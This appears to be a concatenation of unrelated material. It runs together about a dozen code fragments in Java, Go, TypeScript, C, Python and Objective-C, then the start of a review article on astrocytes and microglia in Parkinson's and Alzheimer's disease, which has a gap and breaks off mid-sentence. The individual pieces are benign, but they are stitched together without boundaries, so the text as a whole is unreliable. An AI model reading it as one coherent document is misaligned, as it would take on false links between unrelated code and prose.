root.setCenter(txtTime); // creating a scene and configuring the stage Scene scene = new Scene(root, 200, 150); stage.initStyle(StageStyle.UTILITY); stage.setScene(scene); timer.start(); stage.show(); } // stop() method of the Application API @Override public void stop() { // we need to stop our working thread after closing a window // or our program will not exit enough = true; } public static void main(String[] args) { launch(args); } public static LocalDateTime changeZone(LocalDateTime localDateTime) { return localDateTime.atZone(ZONE_UTC).withZoneSameInstant(ZONE_GTM).toLocalDateTime(); } }
// _ _ // __ _____ __ ___ ___ __ _| |_ ___ // \ \ /\ / / _ \/ _` \ \ / / |/ _` | __/ _ \ // \ V V / __/ (_| |\ V /| | (_| | || __/ // \_/\_/ \___|\__,_| \_/ |_|\__,_|\__\___| // // Copyright © 2016 - 2022 SeMI Technologies B.V. All rights reserved. // // CONTACT: <EMAIL> // package vectorizer import ( "context" "strings" "testing" "github.com/semi-technologies/weaviate/entities/models" "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" ) // These are mostly copy/pasted (with minimal additions) from the // text2vec-contextionary module func TestVectorizingObjects(t *testing.T) { type testCase struct { name string input *models.Object expectedClientCall string expectedPoolingStrategy string noindex string excludedProperty string // to simulate a schema where property names aren't vectorized excludedClass string // to simulate a schema where class names aren't vectorized poolingStrategy string } tests := []testCase{ { name: "empty object", input: &models.Object{ Class: "Car", }, poolingStrategy: "cls", expectedPoolingStrategy: "cls", expectedClientCall: "car", }, { name: "object with one string prop", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "brand": "Mercedes", }, }, expectedClientCall: "car brand mercedes", }, { name: "object with one non-string prop", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "power": 300, }, }, expectedClientCall: "car", }, { name: "object with a mix of props", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "brand": "best brand", "power": 300, "review": "a very great car", }, }, expectedClientCall: "car brand best brand review a very great car", }, { name: "with a noindexed property", noindex: "review", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "brand": "best brand", "power": 300, "review": "a very great car", }, }, expectedClientCall: "car brand best brand", }, { name: "with the class name not vectorized", excludedClass: "Car", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "brand": "best brand", "power": 300, "review": "a very great car", }, }, expectedClientCall: "brand best brand review a very great car", }, { name: "with a property name not vectorized", excludedProperty: "review", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "brand": "best brand", "power": 300, "review": "a very great car", }, }, expectedClientCall: "car brand best brand a very great car", }, { name: "with no schema labels vectorized", excludedProperty: "review", excludedClass: "Car", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "review": "a very great car", }, }, expectedClientCall: "a very great car", }, { name: "with string/text arrays without propname or classname", excludedProperty: "reviews", excludedClass: "Car", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "reviews": []interface{}{ "a very great car", "you should consider buying one", }, }, }, expectedClientCall: "a very great car you should consider buying one", }, { name: "with string/text arrays with propname and classname", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "reviews": []interface{}{ "a very great car", "you should consider buying one", }, }, }, expectedClientCall: "car reviews a very great car reviews you should consider buying one", }, { name: "with compound class and prop names", input: &models.Object{ Class: "SuperCar", Properties: map[string]interface{}{ "brandOfTheCar": "best brand", "power": 300, "review": "a very great car", }, }, expectedClientCall: "super car brand of the car best brand review a very great car", }, } for _, test := range tests { t.Run(test.name, func(t *testing.T) { client := &fakeClient{} v := New(client) ic := &fakeSettings{ excludedProperty: test.excludedProperty, skippedProperty: test.noindex, vectorizeClassName: test.excludedClass != "Car", poolingStrategy: test.poolingStrategy, } err := v.Object(context.Background(), test.input, ic) require.Nil(t, err) assert.Equal(t, models.C11yVector{0, 1, 2, 3}, test.input.Vector) expected := strings.Split(test.expectedClientCall, " ") actual := strings.Split(client.lastInput, " ") assert.Equal(t, expected, actual) assert.Equal(t, client.lastConfig.PoolingStrategy, test.expectedPoolingStrategy) }) } }
import React, {useContext} from "react"; import {AccordionContext, OverlayTrigger, Tooltip, useAccordionToggle} from "react-bootstrap"; import {MdExpandLess, MdExpandMore} from "react-icons/all"; import InteractionHandler from "../player/InteractionHandler"; import "../player/ControlButton.css"; interface QueueExpandToggleProps { eventKey: string } const QueueExpandToggle = (props: QueueExpandToggleProps) => { const currentEventKey = useContext(AccordionContext); const decoratedOnClick = useAccordionToggle(props.eventKey); const isCurrentEventKey = currentEventKey === props.eventKey; return ( <OverlayTrigger placement={"top"} overlay={ <Tooltip id={"tooltip-queue-expand"}> {isCurrentEventKey ? "Hide queue" : "Show queue"} </Tooltip> }> <div style={{display: "inline-flex"}}> <InteractionHandler className={"control-button ml-1"} onClick={(e, touch) => { decoratedOnClick(e); }}> {isCurrentEventKey ? <MdExpandLess/> : <MdExpandMore/> } </InteractionHandler> </div> </OverlayTrigger> ); }; export default QueueExpandToggle;
class Department: """A department at the university""" longname: str name: str @classmethod def from_xml(cls, elem: Element): """Construct new Department from an XML element""" return cls(elem.get("longname"), elem.get("name"))
/* * Copyright 2022 NXP * * SPDX-License-Identifier: Apache-2.0 */ #include <zephyr/zephyr.h> #include <zephyr/drivers/sdhc.h> #include <zephyr/sd/sd.h> #include <zephyr/sd/sdmmc.h> #include <zephyr/sd/sd_spec.h> #include <zephyr/logging/log.h> #include <zephyr/sys/__assert.h> #include "sd_utils.h" #include "sdmmc_priv.h" LOG_MODULE_REGISTER(sd, CONFIG_SD_LOG_LEVEL); /* Idle all cards on bus. Can be used to clear errors on cards */ static inline int sd_idle(struct sd_card *card) { struct sdhc_command cmd = {0}; /* Reset card with CMD0 */ cmd.opcode = SD_GO_IDLE_STATE; cmd.response_type = (SD_RSP_TYPE_NONE | SD_SPI_RSP_TYPE_R1); cmd.timeout_ms = CONFIG_SD_CMD_TIMEOUT; return sdhc_request(card->sdhc, &cmd, NULL); } /* Sends CMD8 during SD initialization */ static int sd_send_interface_condition(struct sd_card *card) { struct sdhc_command cmd = {0}; int ret; uint32_t resp; cmd.opcode = SD_SEND_IF_COND; cmd.arg = SD_IF_COND_VHS_3V3 | SD_IF_COND_CHECK; cmd.response_type = (SD_RSP_TYPE_R7 | SD_SPI_RSP_TYPE_R7); cmd.timeout_ms = CONFIG_SD_CMD_TIMEOUT; ret = sdhc_request(card->sdhc, &cmd, NULL); if (ret) { LOG_DBG("SD CMD8 failed with error %d", ret); /* Retry */ return SD_RETRY; } if (card->host_props.is_spi) { resp = cmd.response[1]; } else { resp = cmd.response[0]; } if ((resp & 0xFF) != SD_IF_COND_CHECK) { LOG_INF("Legacy card detected, no CMD8 support"); /* Retry probe */ return SD_RETRY; } if ((resp & SD_IF_COND_VHS_MASK) != SD_IF_COND_VHS_3V3) { /* Card does not support 3.3V */ return -ENOTSUP; } LOG_DBG("Found SDHC with CMD8 support"); card->flags |= SD_SDHC_FLAG; return 0; } /* Sends CMD59 to enable CRC checking for SD card in SPI mode */ static int sd_enable_crc(struct sd_card *card) { struct sdhc_command cmd = {0}; /* CMD59 for CRC mode is only valid for SPI hosts */ __ASSERT_NO_MSG(card->host_props.is_spi); cmd.opcode = SD_SPI_CRC_ON_OFF; cmd.arg = 0x1; /* Enable CRC */ cmd.response_type = SD_SPI_RSP_TYPE_R1; cmd.timeout_ms = CONFIG_SD_CMD_TIMEOUT; return sdhc_request(card->sdhc, &cmd, NULL); } /* * Perform init required for both SD and SDIO cards. * This function performs the following portions of SD initialization * - CMD0 (SD reset) * - CMD8 (SD voltage check) */ static int sd_common_init(struct sd_card *card) { int ret; /* Reset card with CMD0 */ ret = sd_idle(card); if (ret) { LOG_ERR("Card error on CMD0"); return ret; } /* Perform voltage check using SD CMD8 */ ret = sd_retry(sd_send_interface_condition, card, CONFIG_SD_RETRY_COUNT); if (ret == -ETIMEDOUT) { LOG_INF("Card does not support CMD8, assuming legacy card"); return sd_idle(card); } else if (ret) { LOG_ERR("Card error on CMD 8"); return ret; } if (card->host_props.is_spi && IS_ENABLED(CONFIG_SDHC_SUPPORTS_SPI_MODE)) { /* Enable CRC for spi commands using CMD59 */ ret = sd_enable_crc(card); } return ret; } static int sd_init_io(struct sd_card *card) { struct sdhc_io *bus_io = &card->bus_io; int ret; /* SD clock should start gated */ bus_io->clock = 0; /* SPI requires SDHC PUSH PULL, and open drain buses use more power */ bus_io->bus_mode = SDHC_BUSMODE_PUSHPULL; bus_io->power_mode = SDHC_POWER_ON; bus_io->bus_width = SDHC_BUS_WIDTH1BIT; /* Cards start with legacy timing and 3.3V signalling at power on */ bus_io->timing = SDHC_TIMING_LEGACY; bus_io->signal_voltage = SD_VOL_3_3_V; /* Toggle power to card to reset it */ LOG_DBG("Resetting power to card"); bus_io->power_mode = SDHC_POWER_OFF; ret = sdhc_set_io(card->sdhc, bus_io); if (ret) { LOG_ERR("Could not disable card power via SDHC"); return ret; } sd_delay(card->host_props.power_delay); bus_io->power_mode = SDHC_POWER_ON; ret = sdhc_set_io(card->sdhc, bus_io); if (ret) { LOG_ERR("Could not disable card power via SDHC"); return ret; } /* After reset or init, card voltage should be 3.3V */ card->card_voltage = SD_VOL_3_3_V; /* Reset card flags */ card->flags = 0U; /* Delay so card can power up */ sd_delay(card->host_props.power_delay); /* Start bus clock */ bus_io->clock = SDMMC_CLOCK_400KHZ; ret = sdhc_set_io(card->sdhc, bus_io); if (ret) { LOG_ERR("Could not start bus clock"); return ret; } return 0; } /* * Sends CMD5 to SD card, and uses response to determine if card * is SDIO or SDMMC card. Return 0 if SDIO card, positive value if not, or * negative errno on error */ int sd_test_sdio(struct sd_card *card) { struct sdhc_command cmd = {0}; int ret; cmd.opcode = SDIO_SEND_OP_COND; cmd.arg = 0; cmd.response_type = (SD_RSP_TYPE_R4 | SD_SPI_RSP_TYPE_R4); cmd.timeout_ms = CONFIG_SD_CMD_TIMEOUT; ret = sdhc_request(card->sdhc, &cmd, NULL); if (ret) { /* * We are just probing card, and it is likely an SD. * return error */ card->type = CARD_SDMMC; return SD_NOT_SDIO; } /* Check the number of I/O functions */ card->num_io = ((cmd.response[0] & SDIO_OCR_IO_NUMBER) >> SDIO_OCR_IO_NUMBER_SHIFT); if ((card->num_io == 0) | ((cmd.response[0] & SDIO_IO_OCR_MASK) == 0)) { if (cmd.response[0] & SDIO_OCR_MEM_PRESENT_FLAG) { /* Card is not an SDIO card. */ card->type = CARD_SDMMC; return SD_NOT_SDIO; } /* Card is not a valid SD device. We do not support it */ return -ENOTSUP; } /* Since we got a valid OCR response, * we know this card is an SDIO card. */ card->type = CARD_SDIO; return 0; } /* * Check SD card type * Uses SDIO OCR response to determine what type of card is present. */ static int sd_check_card_type(struct sd_card *card) { int ret; /* Test if the card response to CMD5 (only SDIO cards will) */ /* Note that CMD5 can take many retries */ ret = sd_test_sdio(card); if ((ret == SD_NOT_SDIO) && card->type == CARD_SDMMC) { LOG_INF("Detected SD card"); return 0; } else if ((ret == 0) && card->type == CARD_SDIO) { LOG_INF("Detected SDIO card"); return 0; } LOG_ERR("No usable card type was found"); return -ENOTSUP; } /* * Performs init flow described in section 3.6 of SD specification. */ static int sd_command_init(struct sd_card *card) { int ret; /* * We must wait 74 clock cycles, per SD spec, to use card after power * on. At 400000KHz, this is a 185us delay. Wait 1ms to be safe. */ sd_delay(1); /* * Start card initialization and identification * flow described in section 3.6 of SD specification */ ret = sd_common_init(card); if (ret) { return ret; } /* Use CMD5 to determine card type */ ret = sd_check_card_type(card); if (ret) { LOG_ERR("Unusable card"); return -ENOTSUP; } if (card->type == CARD_SDMMC) { /* * Reset the card first- CMD5 sent to see if it is SDIO card * may have left it in error state */ ret = sd_common_init(card); if (ret) { LOG_ERR("Init after CMD5 failed"); return ret; } /* Perform memory card initialization */ ret = sdmmc_card_init(card); } else if (card->type == CARD_SDIO) { LOG_ERR("SDIO cards not currently supported"); return -ENOTSUP; } if (ret) { LOG_ERR("Card init failed"); return ret; } return 0; } /* Initializes SD/SDIO card */ int sd_init(const struct device *sdhc_dev, struct sd_card *card) { int ret; if (!sdhc_dev) { return -ENODEV; } card->sdhc = sdhc_dev; ret = sdhc_get_host_props(card->sdhc, &card->host_props); if (ret) { LOG_ERR("SD host controller returned invalid properties"); return ret; } /* init and lock card mutex */ ret = k_mutex_init(&card->lock); if (ret) { LOG_DBG("Could not init card mutex"); return ret; } ret = k_mutex_lock(&card->lock, K_MSEC(CONFIG_SD_INIT_TIMEOUT)); if (ret) { LOG_ERR("Timeout while trying to acquire card mutex"); return ret; } /* Initialize SDHC IO with defaults */ ret = sd_init_io(card); if (ret) { k_mutex_unlock(&card->lock); return ret; } /* * SD protocol is stateful, so we must account for the possibility * that the card is in a bad state. The return code SD_RESTART * indicates that the initialization left the card in a bad state. * In this case the subsystem takes the following steps: * - set card status to error * - re init host I/O (will also toggle power to the SD card) * - retry initialization once more * If initialization then fails, the sd_init routine will assume the * card is inaccessible */ ret = sd_command_init(card); if (ret == SD_RESTART) { /* Reset I/O, and retry sd initialization once more */ card->status = CARD_ERROR; /* Reset I/O to default */ ret = sd_init_io(card); if (ret) { LOG_ERR("Failed to reset SDHC I/O"); k_mutex_unlock(&card->lock); return ret; } ret = sd_command_init(card); if (ret) { LOG_ERR("Failed to init SD card after I/O reset"); k_mutex_unlock(&card->lock); return ret; } } else if (ret != 0) { /* Initialization failed */ k_mutex_unlock(&card->lock); card->status = CARD_ERROR; return ret; } /* Card initialization succeeded. */ card->status = CARD_INITIALIZED; /* Unlock card mutex */ ret = k_mutex_unlock(&card->lock); if (ret) { LOG_DBG("Could not unlock card mutex"); return ret; } return ret; } /* Return true if card is present, false otherwise */ bool sd_is_card_present(const struct device *sdhc_dev) { if (!sdhc_dev) { return false; } return sdhc_card_present(sdhc_dev) == 1; }
from pymongo import MongoClient from pprint import pprint from Lesson2 import hh client = MongoClient('127.0.0.1', 27017) db = client['jobs_database'] jobs_data = db.jobs_data # dicts = hh('C++', 1) # jobs_data.insert_many(dicts) # for job in jobs_data.find({}): # pprint(job) def find_min_salary(min_salary): for job in jobs_data.find({'$or': [{'salary_min': {'$gte': min_salary}, 'salary_max': {'$gte': min_salary}}]}): pprint(job) def new_jobs_to_db(jobs): c = 0 for job in jobs: if jobs_data.count_documents({'link': job['link']}) == 0: db.jobs_data.insert_one(job) c += 1 print(f"{c} ваканий добавлено в базу данных") find_min_salary(100000) new_jobs_to_db(hh('html', 1))
package goshare /* DelKey deletes val for a given key, returns status. */ func DelKey(key string) bool { return tsds.DelKey(key) } /* DelKeyNS deletes given key's namespace and all its values, returns status. */ func DelKeyNS(key string) bool { return tsds.DeleteNSRecursive(key) } /* DelKeyTSDS deletes all keys under given namespace, same as NS. As here TimeSeries is a NameSpace */ func DelKeyTSDS(key string) bool { return tsds.DeleteTSDS(key) } /* DeleteFuncByKeyType calls a delete action for a key based on task-type. */ func DeleteFuncByKeyType(keyType string) FunkAxnParamKey { switch keyType { case "tsds": return DelKeyTSDS case "ns": return DelKeyNS default: return DelKey } } /* DeleteFromPacket can handle multi-keys delete action, it acts on packet data. */ func DeleteFromPacket(packet Packet) bool { status := true axnFunk := DeleteFuncByKeyType(packet.KeyType) for _, _key := range packet.KeyList { status = status && axnFunk(_key) } return status }
<gh_stars>1-10 import React from 'react' import '@testing-library/jest-dom/extend-expect' import { render, RenderResult } from '@testing-library/react' import { CodeBlock } from '.' describe('CodeBlock', () => { let wrapper: RenderResult describe('with required props', () => { beforeEach(() => { wrapper = render( <CodeBlock filename="Example Filename" language="js"> {`function helloWorld () { return 'Hello, World!' }`} </CodeBlock> ) }) it('render the filename', () => { expect(wrapper.getByTestId('codeblock-filename')).toHaveTextContent( 'Example Filename' ) }) }) })
# include <stdio.h> # include <string.h> typedef struct { int izq, der, value, vmostizq, vmostder, hijos[2], nhijos; double avarage; } NODO; NODO arbol[200002]; int root; void getmostValues( int node ){ if( node == -1) return; getmostValues( arbol[ node ].izq ); getmostValues( arbol[ node ].der ); if( arbol[node].izq == -1 ){ arbol[ node].vmostizq = arbol[node].vmostder = arbol[ node ].value; }else{ arbol[ node ].vmostizq = arbol[arbol[node].izq].vmostizq; arbol[ node ].vmostder = arbol[arbol[node].der].vmostder; } } void procesa( int node, int count, long long values){ if( node == -1 ) return; if( count > 0 ){ arbol[ node ].avarage = (double)values / (double)count; } if( arbol[ node ].izq != -1 ) procesa( arbol[ node ].izq, count + 1, values + (long long)arbol[ arbol[ node ].der ].vmostizq ); if( arbol[ node ].der != -1 ) procesa( arbol[ node ].der, count + 1, values + (long long)arbol[ arbol[ node ].izq ].vmostder ); } int posArray[100002]; int compare( int *a, int *b){ return arbol[*a].value - arbol[*b].value; } main(){ int x, y, c, npos, padre, value, k, izq , der , media, n, res; scanf("%d", &n); for( x = 1; x <= n; x++){ arbol[ x ].izq = -1; arbol[ x ].der = -1; arbol[x].nhijos = 0; } for( x = 1; x <= n; x++){ scanf("%d %d", &padre, &value); if( padre == -1){ root = x; arbol[ x ].value = value; }else{ arbol[ x ].value = value; arbol[ padre ].hijos[ arbol[ padre ].nhijos++ ] = x; } } for( x = 1; x <= n; x++){ for( y = 0; y < arbol[ x ].nhijos ; y++){ if( arbol[ x ].value < arbol[ arbol[ x ].hijos[ y ] ].value ){ arbol[x].der = arbol[ x ].hijos[ y ]; }else { arbol[x].izq = arbol[ x ].hijos[ y ]; } } } getmostValues( root ); procesa( root, 0, 0 ); npos = 0; for(x = 1; x <= n; x++){ posArray[ npos++ ] = x; } qsort( posArray, npos, sizeof( int ), compare ); scanf("%d", &k); for( x = 0; x < k; x++){ scanf("%d", &value); izq = 0; der = npos - 1; res = 0; while( izq <= der ){ media = (izq + der) / 2; if( value > arbol[ posArray[ media ]].value ){ izq = media + 1; res = media; } else{ der = media - 1; } } while( arbol[posArray[res]].izq != -1) res++; printf("%.10lf\n", arbol[posArray[ res ]].avarage); } return 0; }
def _get_ground_template(self, width_estimate, stretch_height=1): if 'ground_template' not in self._cache: filename = 'ground_%s.yaml' % self.params['ground/template'] path = os.path.join(os.path.dirname(__file__), 'assets', filename) if not os.path.isfile(path): return None self._cache['ground_template'] = np.array(yaml.load(open(path))) t_points = self._cache['ground_template'].copy() t_points *= width_estimate t_points[:, 1] *= stretch_height width_fraction = self.params['ground/template_width_fraction'] margin_vert = int(self.params['ground/template_margin']) t_width = int(np.ceil(width_fraction*width_estimate)) width_crop = (width_estimate - t_width)/2 t_points[:, 0] -= width_crop t_points = np.array([p for p in t_points if 0 < p[0] < t_width]) t_points[:, 1] += margin_vert - t_points[:, 1].min() t_height = int(np.ceil(t_points[:, 1].max())) + margin_vert t_points = t_points.tolist() t_points.append((t_width, margin_vert)) t_points.append((t_width, t_height)) t_points.append((0, t_height)) t_points.append((0, margin_vert)) template = np.zeros((t_height, t_width), np.uint8) cv2.fillPoly(template, [np.array(t_points, np.int32)], 255) return template, t_points[:-4]
// AssignPropertiesFromCorsRule populates our CorsRule from the provided source CorsRule func (rule *CorsRule) AssignPropertiesFromCorsRule(source *v1alpha1api20210401storage.CorsRule) error { rule.AllowedHeaders = genruntime.CloneSliceOfString(source.AllowedHeaders) if source.AllowedMethods != nil { allowedMethodList := make([]CorsRuleAllowedMethods, len(source.AllowedMethods)) for allowedMethodIndex, allowedMethodItem := range source.AllowedMethods { allowedMethodItem := allowedMethodItem allowedMethodList[allowedMethodIndex] = CorsRuleAllowedMethods(allowedMethodItem) } rule.AllowedMethods = allowedMethodList } else { rule.AllowedMethods = nil } rule.AllowedOrigins = genruntime.CloneSliceOfString(source.AllowedOrigins) rule.ExposedHeaders = genruntime.CloneSliceOfString(source.ExposedHeaders) rule.MaxAgeInSeconds = genruntime.ClonePointerToInt(source.MaxAgeInSeconds) return nil }
/** * Checks whether an Atom object conforms to the name and alternative * location of the first atom as set by the user. * @param atom * - Atom object * @return {@code TRUE} if atom corresponds to the first atom identifier as * set by the user, {@code FALSE} otherwise. */ private static boolean isAtomRelevant1(final Atom atom) { if (!CrossLinkParameter.getParameter(Parameter.ATOM_TYPE1).equals("")) { if (CrossLinkParameter.getParameter(Parameter.ATOM_TYPE1).indexOf( "#" + atom.getName().trim() + "#" ) != -1 && CrossLinkParameter.getParameter( Parameter.ALTERNATIVE_LOCATION1).indexOf( Character.toString(atom.getAlternativeLocation()) ) != -1) { return true; } return false; } else { return true; } }
// // ChatSystem.h // AFNetworking // // Created by lijunlin on 2019/8/27. // #import <Foundation/Foundation.h> #define ACTION_UPDATE_DONOTHING 0 #define ACTION_UPDATE_ONESESSION 1 #define ACTION_UPDATE_ALLSESSION 2 NS_ASSUME_NONNULL_BEGIN @interface ChatSystem : NSObject //系统动作 @property(nonatomic,assign) NSInteger sysAction; //标题 @property(nonatomic,copy) NSString* sysTitle; //内容 @property(nonatomic,copy) NSString* sysBody; //数据 @property(nonatomic,copy) NSString* sysData; //系统时间 @property(nonatomic,copy) NSString* sysTime; @end NS_ASSUME_NONNULL_END
Dysfunctional glia: contributors to neurodegenerative disorders Astrocytes are integral components of the central nervous system, where they are involved in numerous functions critical for neuronal development and functioning, including maintenance of blood-brain barrier, formation of synapses, supporting neurons with nutrients and trophic factors, and protecting them from injury. These roles are markedly affected in the course of chronic neurodegenerative disorders, often before the onset of the disease. In this review, we summarize the recent findings supporting the hypothesis that astrocytes play a fundamental role in the processes contributing to neurodegeneration. We focus on α-synucleinopathies and tauopathies as the most common neurodegenerative diseases. The mechanisms implicated in the development and progression of these disorders appear not to be exclusively neuronal, but are often related to the astrocytic-neuronal integrity and the response of astrocytes to the altered microglial function. A profound understanding of the multifaceted functions of astrocytes and identification of their communication pathways with neurons and microglia in health and in the disease is of critical significance for the development of novel mechanism-based therapies against neurodegenerative disorders. Introduction A growing body of evidence points to the crucial importance of astrocytes and their interplay with neurons in the brain function and dysfunction. Recent studies show that these interactions are even more complex, involving a contribution of the third factor, the microglial cells. In the first part of this article, we briefly overview the role of astrocytes and microglia in the functioning of the central nervous system (CNS). Then we focus on the contribution of the astrocytic dysfunction and defective astrocyte-neuron integrity for the pathogenesis of neurodegenerative disorders, mainly Parkinson's disease (PD) and Alzheimer's disease (AD) and other tauopathies. Finally, we discuss the involvement of impaired modulation of astrocytes by activated microglia in the mechanisms of neurodegeneration. More specifically, we are describing the metabolic, synaptic and inflammatory changes that affect microglia-astrocyte-neuron cross-talk in the course of neurodegeneration. We provide an overview of the novel insights into the key mechanisms of abnormal interactions among microglia, astrocytes and neurons that are involved in the neurodegenerative processes. Astrocyte-Neuron Interactions in the Central Nervous System Astrocytes are considered as the most abundant glial cells in the CNS, where they make up 20-40% of glial and serve as the crucial regulators of the CNS in its development and functioning (Pekny and Pekna, 2014). Additionally, astrocytes may play a critical, either neuroprotective or neurotoxic function in virtually all the disorders of the CNS. Morphologically and functionally, heterogeneous populations of astrocytes are distinguished, including fibrous astrocytes, found mainly in the white matter, protoplasmic astrocytes present mostly in the grey matter, radial glia present in periventricular area during brain development, perivascular astrocytes, marginal astrocytes, Müller cells in the retina, Bergmann glia in the cerebellum, and pituicytes in the neuro-hypophysis . Physiologically, astrocytes provide structural and metabolic support to neurons, being involved in vascular homeostasis, fluid balance and regulation of ion concentrations in the brain (Volterra and Meldolesi, 2005). Perivascular astroglia are the part of neurovascular unit, where they maintain the proper functioning of the blood-brain barrier, i.e. by regulating fluid flow through the bidirectional water channel, aquaporin-4 (Bi et al., 2017). Also, astrocytes are enriched with the enzymes involved in glycolytic pathway and produce glycogen, as a source of lactate that can be transferred to neighboring neurons by monocarboxylate transporters (Magistretti and Allaman, 2018). This pathway, known as lactate shuttle, links astrocytic glycolysis with neuronal oxidative metabolism. (Gln) and Glu. In astrocytes, Gln is synthesized from Glu and ammonia, in a reaction mediated by astrocyte-specific enzyme, Gln synthetase (GS) (Martinez-Hernandez et al., 1977). Gln is transferred to neurons, where it is hydrolyzed to Glu by phosphate-activated glutaminase (PAG). Dependent on the neuron type, Glu can be included into neurotransmitter pool of Glu, or can be converted to GABA in the reaction mediated by Glu decarboxylase (Bak et al., 2006). Additionally, Glu can be converted to α-ketoglutaric acid by Glu dehydrogenase, to supplement tricarboxylic acid and neuronal energy production (Martinez-Hernandez et al., 1977). Although Glu can be produced by the carboxylation of pyruvate or the transamination of α-ketoglutaric acid, astrocyte-derived Gln is the main source of neurotransmitter pool of Glu (Hamberger et al., 1978). Following the release from synaptic terminals, Glu is taken up by neighboring astrocytes by Glu transporters and converted to Gln, what closes this circular astrocyticneuronal pathway, known as a Gln/Glu cycle (GGC) (Bak et al., 2006). This pathway involves cooperation of astrocytic and neuronal transmembrane transporters. Sodium-dependent Glu transporters, GLT1 (Glu transporter 1; EAAT2) and GLAST (glutamate-aspartate transporter; EAAT1) are localized perisynaptically on the astrocytic cell membrane (Takumi et al., 1997). Cellular translocation of Gln across the membranes of the CNS cells involves complex carrier systems that, apart from Gln, can transport some other amino acids. Individual members of these transporter families are characterized by defined cellular distribution and substrate specificity and different affinity to specific amino acids (Bröer, 2014). Among them, the sodium-dependent systems N, ASC, and A play major role in Gln transportation. The bi-directional transporters, belonging to the system N, sodium coupled neutral amino acid transporter SNAT3 and SNAT5 are specifically located in the astrocytes (Boulland et al., 2002). In addition, the outward translocation of Gln from astrocytes is also supported by the transporters representing the other systems -ASCT2 (alanine-serine-cysteine transporter 2, belonging to the system ASC) and LAT2 (L-type AA transporter 2, belonging to the sodium-independent system L) (Deitmer et al., 2003). The unidirectional System A transporter SNAT1 (alanine transporter 1) that mediates Gln uptake, is mostly responsible for Gln uptake by neurons . Gln transporters are also present in brain capillaries. Endothelial cells of cerebral microvessels connected by tight junctions, forming the blood brain barrier are polarized into luminal (blood-facing) and abluminal (brain-facing) plasma membrane domains. The transporters belonging to the system N transfer Gln within the membrane vesicles enriched in the abluminal membranes of capillaries. The vesicles present in the luminal membranes transfer Gln by the sodium-independent transporter(s) that are yet poorly characterized (Bröer and Brookes, 2001). In order to control neurotransmission properly, the neurons need to constantly replenish the neurotransmitters in the synaptic vesicles. These complex reactions involve surrounding glial cells that actively participate in this process by providing the precursors for neurotransmitter synthesis, recycling the transmitters and removing toxic metabolites. The majority of Gln release from astrocytes is mediated by an astrogliaspecific carrier, SNAT3, that is present in the close proximity to the synapse. The released Gln, is then taken up by a variety of transporter proteins localized on the nerve terminals and used for re-synthesis of Glu and GABA (Bak et al., 2006). A recent evidence suggests that astrocytes, together with preand post-synaptic neuronal terminals, are a part of the so called tripartite synapse (Verkhratsky and Nedergaard, 2014). Such a localization of astrocytes, allows them to participate in the structural formation and functioning of the synapses (Allen and Lyons, 2018). It is well established that astrocytes constantly and actively release different neurotrophic factors including proteins, like chemokines or cytokines (e.g., glial cell linederived neurotrophic factor, nerve growth factor) as well as small metabolites (e.g., nucleosides and nucleotides) that support neuronal function and survival (Verkhratsky et al., 2016). These factors can be delivered to the neurons either via exocytosis or can be contained in the astrocyte-released exosomes (Vanturini et al., 2019). Exocytosis is responsible for delivery of astrocyte-derived proteins, like extracellular matrix components, growth factors, chemokines and cytokines, when exosomes most often contain membrane proteins and RNA (Verkhratsky et al., 2016). These factors are essential for several processes, like maintaining neuronal health and extension of neurite outgrowths (Meyer-Franke et al., 1995). Furthermore, neuronal cells are characterized by relatively low levels of endogenous antioxidants. Astroglia support neurons by supplying a major cellular antioxidant, a reduced form of glutathione (Mcbean, 2018). Astrocytes in Diseased Brain As mentioned above, the astrocytes, by providing essential support to neurons, play a pivotal role in the proper functioning of the healthy brain (Verkhratsky and Nedergaard, 2014). Properly functioning astroglia are critical for antioxidative defense and neutralization of reactive oxygen and nitrogen species (ROS/RNS) in neurons. However, in the injury or disease, the CNS is often exposed to extensive oxidative and nitrosative stress. Overproduction of ROS/RNS challenges the antioxidative defense system, what induces astrocytic response, so called reactive astrogliosis, that involves a series of biochemical and morphological changes (Yates, 2015). Also cytokines (e.g., transforming growth factor), interleukin-6 (IL-6) or ciliary neurotrophic factor) may be involved in the activation of reactive astrogliosis via the STAT3 signaling pathway (Pekny and Pekna, 2014). This process is associated with upregulation of astrocyte-specific structural proteins (glial fibrillary acidic protein (GFAP) and vimentin) as well as functional abnormalities, including impaired expression and function of GGC-related transporters and enzymes. Astrocyte activation is also manifested by increased expression of potassium channels and by the disruption of antioxidant molecules (e.g., glutathione) homeostasis. Response of astrocytes to acute and chronic cellular stress and further progressive reactive astrogliosis can result in a release of toxic factors, directly supporting neuronal injury and dysfunction (Rizor et al., 2019). Astrocytes and α-Synucleinopathies Astrocytic failure appears to precede various forms of neurodegenerative pathologies. For example astrocytes are involved in the neuropathology of PD via augmentation of oxidative and nitrosative stress. The studies using PD transgenic (tg) animal models and post-mortem analysis of PD patient's brains revealed astrocyte activation and ROS/ RNS elevation as a substantial hallmark of the PD-associated pathology (Rizor et al., 2019). An improper folding of disease-specific proteins, leading to neuronal damage, is the major feature of individual neurodegenerative disorders. α-Synuclein (αSYN) protein is present in the presynaptic terminals, and, under normal physiological conditions, plays a role in maintaining vesicular trafficking and SNARE complex formation. In the PD, αSYN undergoes incorrect folding, what results in its aggregation and formation of Lewy bodies (Lashuel et al., 2013). αSYN is the main component of the neuropathological lesions present also in some other disorders, collectively known as α-synucleinopathies, that include, apart from PD, also dementia with Lewy bodies, multiple system atrophy (Wegrzynowicz et al., 2019). Aggregation of αSYN is directly responsible for the disruption of dopaminergic and cholinergic neurotransmission and further cell death in PD. The exact mechanisms responsible for improper folding of αSYN remain to be clarified. Recent studies suggest that αSYN aggregates can spread between cells and tissues using a prion-like selfpropagation mechanism (Figure 1). It is well established that aggregated αSYN are present in the cytoplasm of astrocytes in human PD brain, what could suggest a role of these cells in the spreading of αSYN pathology. Indeed, in vitro study revealed that primary astrocytes can take up aggregated αSYN secreted from co-cultured SH-SY5Y human neuroblastoma cells The accumulation of pathological αSYN deposits in astroglia promotes, in turn, a secretion of chemokines and proinflammatory cytokines (e.g., IL-1, IL-6, 